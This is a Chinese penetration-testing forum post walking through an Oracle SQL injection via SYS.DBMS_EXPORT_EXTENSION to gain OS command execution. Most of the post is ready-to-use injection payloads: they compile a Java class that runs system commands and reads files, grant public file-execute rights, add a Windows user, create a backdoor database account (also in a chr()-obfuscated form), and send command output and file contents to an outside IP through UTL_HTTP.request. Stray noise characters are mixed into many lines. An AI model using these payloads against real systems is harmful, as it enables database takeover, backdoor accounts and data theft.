找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 实例演示oracle注入获取cmdshell的全过程
返回列表 发新帖
查看: 2592|回复: 0
打印 上一主题 下一主题

实例演示oracle注入获取cmdshell的全过程

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-18 12:21:48 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
以下的演示都是在web上的sql plus执行的,在web注入时 把select SYS.DBMS_EXPORT_EXTENSION.....改成 7 s6 l0 z( F# K2 d! ]
/ V: K) G9 _. h8 j
  /xxx.jsp?id=1 and '1'<>'a'||(select SYS.DBMS_EXPORT_EXTENSION.....) * v, |. r- g5 c* {+ d/ _3 D
的形式即可。(用" 'a'|| "是为了让语句返回true值) ' K; y8 [$ _. w# m
语句有点长,可能要用post提交。 ) r! y# N# K* ]0 O# B! y$ J
以下是各个步骤:
. S; }: |  `. y9 {1.创建包 6 B3 m8 d% \6 a5 A9 D0 l- D
通过注入 SYS.DBMS_EXPORT_EXTENSION 函数,在oracle上创建Java包LinxUtil,里面两个函数,runCMD用于执行系统命令,readFile用于读取文件:/ g, G5 ~: v  H" T+ ?2 w1 q
/xxx.jsp?id=1 and '1'<>'a'||(
+ @. t8 {4 v% c5 K/ y. x0 `2 }2 dselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 m2 s0 W  Z8 j! L: p$ X
create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(
3 y, h" k8 |( G% m9 nnew InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}public static String readFile(String filename){try{BufferedReader myReader= new BufferedReader(new FileReader(filename)); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}/ s" P. Q" T$ G& Z% j7 M
}'''';END;'';END;--','SYS',0,'1',0) from dual
- g7 b6 g6 L8 t- }2 P) U) 1 l$ R( u. o- W3 O; ^" J* b
------------------------ 2 u  R; j9 M0 o- H, I5 N( y" q- u
如果url有长度限制,可以把readFile()函数块去掉,即:
0 W7 x/ d/ l2 t! Z3 K; [$ w/xxx.jsp?id=1 and '1'<>'a'||(
% T0 D4 c/ x: e  W) ~select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
$ ?+ G; t6 K8 ], }( n% P7 ^3 ]create or replace and compile java source named "LinxUtil" as import java.io.*; public class LinxUtil extends Object {public static String runCMD(String args) {try{BufferedReader myReader= new BufferedReader(& I0 l. g. J4 h
new InputStreamReader( Runtime.getRuntime().exec(args).getInputStream() ) ); String stemp,str="";while ((stemp = myReader.readLine()) != null) str +=stemp+"\n";myReader.close();return str;} catch (Exception e){return e.toString();}}
& u# i+ O3 o0 u7 B% h}'''';END;'';END;--','SYS',0,'1',0) from dual / w$ Z5 [- i' y2 }: O( H
) % j% k3 F2 {) Z& ]( e# T
同时把后面步骤 提到的 对readFile()的处理语句去掉。
' P% X5 X. E; q1 N5 {% T1 f------------------------------ & g- v' _# g+ m0 s3 O+ W$ W7 _
2.赋Java权限 9 r; B+ ?! x5 a  L9 y
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''begin dbms_java.grant_permission( ''''''''PUBLIC'''''''', ''''''''SYS:java.io.FilePermission'''''''', ''''''''<<ALL FILES>>'''''''', ''''''''execute'''''''' );end;'''';END;'';END;--','SYS',0,'1',0) from dual
, v3 L9 ?/ N4 d7 e" r% }3.创建函数 9 {- D' t! C' U- P7 b
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
/ P0 M+ j3 K3 b, g! C" j( t; Vcreate or replace function LinxRunCMD(p_cmd in varchar2)  return varchar2  as language java name ''''''''LinxUtil.runCMD(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual
3 u% L; m# q& k9 _select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
. e: W: h; {: H& g8 acreate or replace function LinxReadFile(filename in varchar2)  return varchar2  as language java name ''''''''LinxUtil.readFile(java.lang.String) return String'''''''';   '''';END;'';END;--','SYS',0,'1',0) from dual" b. }% u& ^' f9 Y/ n2 ~
4.赋public执行函数的权限 . r# A+ t) I$ {9 s7 k. ?  k+ J
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxRunCMD to public'''';END;'';END;--','SYS',0,'1',0) from dual
. U- p2 L+ W- [: M& s5 Lselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''grant all on LinxReadFile to public'''';END;'';END;--','SYS',0,'1',0) from dual6 X$ ]( W' G/ v* e
5.测试上面的几步是否成功
/ @9 I3 S. B1 Vand '1'<>'11'||(
5 h7 R  K$ W" n  }5 Oselect  OBJECT_ID from all_objects where  object_name ='LINXRUNCMD' 3 F2 u% j" x0 `3 k/ n, n
)
0 |9 h0 G) m$ p, Q  aand '1'<>( ' {4 o1 [; N- R: x
select  OBJECT_ID from all_objects where  object_name ='LINXREADFILE'
/ t5 H% o$ I( k& S, ]* L) c) % ?9 a9 A1 h; b  j
6.执行命令:
0 F5 u5 X7 B' n. c/xxx.jsp?id=1 and '1'<>( # t2 f* U( b5 L+ [
select  sys.LinxRunCMD('cmd /c net user linx /add') from dual , F9 e6 Q3 G  Q+ `; ?
# }4 ]: d6 ]7 l0 `
) 4 H4 S% M6 U9 D. G
/xxx.jsp?id=1 and '1'<>(   L: f% S+ D' @7 v9 C
select  sys.LinxReadFile('c:/boot.ini') from dual. }. F( n+ A! d. A$ P

& }+ L' ]# j0 |)
8 a1 X' K3 ]5 v9 S% [/ E  7 A% ~7 g: C, c* A
注意sys.LinxReadFile()返回的是varchar类型,不能用"and 1<>" 代替 "and '1'<>"。
6 D/ C  w5 H' d- l# C如果要查看运行结果可以用 union : 4 S) T6 U  w0 N- I8 V; b+ w
/xxx.jsp?id=1 union select  sys.LinxRunCMD('cmd /c net user linx /add') from dual
& Q  E+ E! W2 J. J或者UTL_HTTP.request(:
9 Q+ T' y$ p$ ?, l/xxx.jsp?id=1 and '1'<>(
8 j2 j# T, X: D  V# U" |8 eSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxRunCMD('cmd /c net user aaa /del'),' ','%20'),'\n','%0A')) FROM dual) J' O  M! N% Y( t; v$ B# }, Y
)
; G: q5 m+ C# A( e0 a/xxx.jsp?id=1 and '1'<>(
7 ?* n* Z& |& |# T4 JSELECT UTL_HTTP.request('http://211.71.147.3/record.php?a=LinxRunCMD:'||REPLACE(REPLACE(sys.LinxReadFile('c:/boot.ini'),' ','%20'),'\n','%0A')) FROM dual0 ], m6 B; T% B6 T  |
) ' Y3 f# h+ q+ {$ u( ]" I
注意:用UTL_HTTP.request时,要用 REPLACE() 把空格、换行符给替换掉,否则会无法提交http request。用utl_encode.base64_encode也可以。# f6 o& u1 n) f
-------------------- 4 e# h/ I' n/ V. u
6.内部变化 $ t( L4 a7 w* k
通过以下命令可以查看all_objects表达改变: 3 o, T% o; U; q0 L
select  * from all_objects where  object_name like '%LINX%' or  object_name like '%Linx%'; m- E* v6 {5 O
7.删除我们创建的函数 ) Z- b6 G* J( ^' N# U
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''9 k0 \& U  T% r1 d' f
drop function LinxRunCMD  '''';END;'';END;--','SYS',0,'1',0) from dual ! {) J3 I' L; \- M
==================================================== ( \0 l( N8 d6 [+ b
全文结束。谨以此文赠与我的朋友。 % [$ n4 U% ?. m! S4 T6 F
linx ! y; A7 s( ]8 ^: G
124829445 - y8 t! v: |) I/ r( e: ~
2008.1.12
7 e! p( U3 @- \. Wlinyujian@bjfu.edu.cn . X, y) E/ Y- b- `) q) K& X
======================================================================
5 w! v8 R) n$ ~测试漏洞的另一方法: 4 a* c8 P9 Z. j) \- z
创建oracle帐号: $ m7 f7 ?$ h- M/ u0 _* i; N
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
2 R6 m2 r3 N( iCREATE USER linxsql IDENTIFIED BY linxsql'''';END;'';END;--','SYS',0,'1',0) from dual% K* l$ e( M: W2 i8 a' E: {/ K, B. b% u, ?
即: 9 o4 ]! Y+ L& {5 P# L
select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES(chr(70)||chr(79)||chr(79),chr(66)||chr(65)||chr(82),
: c  W6 C4 c& ]. s8 l! ]0 [* ]( R  @chr(68)||chr(66)||chr(77)||chr(83)||chr(95)||chr(79)||chr(85)||chr(84)||chr(80)||chr(85)||chr(84)||chr(34)||chr(46)||chr(80)||chr(85)||chr(84)||chr(40)||chr(58)||chr(80)||chr(49)||chr(41)||chr(59)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(68)||chr(69)||chr(67)||chr(76)||chr(65)||chr(82)||chr(69)||chr(32)||chr(80)||chr(82)||chr(65)||chr(71)||chr(77)||chr(65)||chr(32)||chr(65)||chr(85)||chr(84)||chr(79)||chr(78)||chr(79)||chr(77)||chr(79)||chr(85)||chr(83)||chr(95)||chr(84)||chr(82)||chr(65)||chr(78)||chr(83)||chr(65)||chr(67)||chr(84)||chr(73)||chr(79)||chr(78)||chr(59)||chr(66)||chr(69)||chr(71)||chr(73)||chr(78)||chr(32)||chr(69)||chr(88)||chr(69)||chr(67)||chr(85)||chr(84)||chr(69)||chr(32)||chr(73)||chr(77)||chr(77)||chr(69)||chr(68)||chr(73)||chr(65)||chr(84)||chr(69)||chr(32)||chr(39)||chr(39)||chr(67)||chr(82)||chr(69)||chr(65)||chr(84)||chr(69)||chr(32)||chr(85)||chr(83)||chr(69)||chr(82)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(32)||chr(73)||chr(68)||chr(69)||chr(78)||chr(84)||chr(73)||chr(70)||chr(73)||chr(69)||chr(68)||chr(32)||chr(66)||chr(89)||chr(32)||chr(108)||chr(105)||chr(110)||chr(120)||chr(115)||chr(113)||chr(108)||chr(39)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(39)||chr(59)||chr(69)||chr(78)||chr(68)||chr(59)||chr(45)||chr(45),chr(83)||chr(89)||chr(83),0,chr(49),0) from dual
) a# R6 B7 \& E确定漏洞存在: " f1 r( a& }/ x
1<>(
3 ]/ W+ j! u/ Z7 n' F* G. ?3 C. uselect user_id from all_users where username='LINXSQL' # h% [+ @& p6 O+ o4 L1 ^# I9 F. U7 n
) # p' \2 w" r& z  h& c7 W$ C/ f
给linxsql连接权限:
, m8 \: ^. X9 Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% |! Y1 e: G/ `, Y  j, p7 |GRANT CONNECT TO linxsql'''';END;'';END;--','SYS',0,'1',0) from dual
' s  y5 h5 e. e+ |! k; h5 P删除帐号:
! L# J9 D# T8 Q, B4 G2 Q; g5 ^  Vselect SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE ''''
% P" l2 D' Q+ c8 e9 m& v5 sdrop user LINXSQL'''';END;'';END;--','SYS',0,'1',0) from dual
3 E# M% k3 k% d; e====================== ( p! q+ F/ C8 y' p" b; X
以下方法创建一个可以执行多语句的函数Linx_query(),执行成功的话返回数值"1",但权限是继承的,可能仅仅是public权限,作用似乎不大,真的要用到话可以考虑grant dba to 当前的User:
8 d& S- K/ ~1 s1.jsp?id=1 and '1'<>(
& ~# Z: K* o; b' X* W$ ?select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT".PUT(:P1);EXECUTE IMMEDIATE ''DECLARE PRAGMA AUTONOMOUS_TRANSACTION;BEGIN EXECUTE IMMEDIATE '''', k, U) A9 J' }; ?6 g
create or replace function Linx_query (p varchar2) return number authid current_user is begin execute immediate p; return 1;  end;   '''';END;'';END;--','SYS',0,'1',0) from dual
' e2 I& d: S: L+ x" m: P) m$ q; a7 _) and ... 1.jsp?id=1 and '1'( select SYS.DBMS_EXPORT_EXTENSION.GET_DOMAIN_INDEX_TABLES('FOO','BAR','DBMS_OUTPUT.PUT(:P1);EXECUTE IMMEDIATE: S# [& q, a* c% \, }. `2 m9 A7 w
 )9 o; `+ T& c7 c9 K8 g

4 u" u) ]6 V1 b. {1 V# s, h7 C: M) o5 y5 Q' O

/ q1 B: A6 d/ P* A  V) _& w& Z! v; k
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表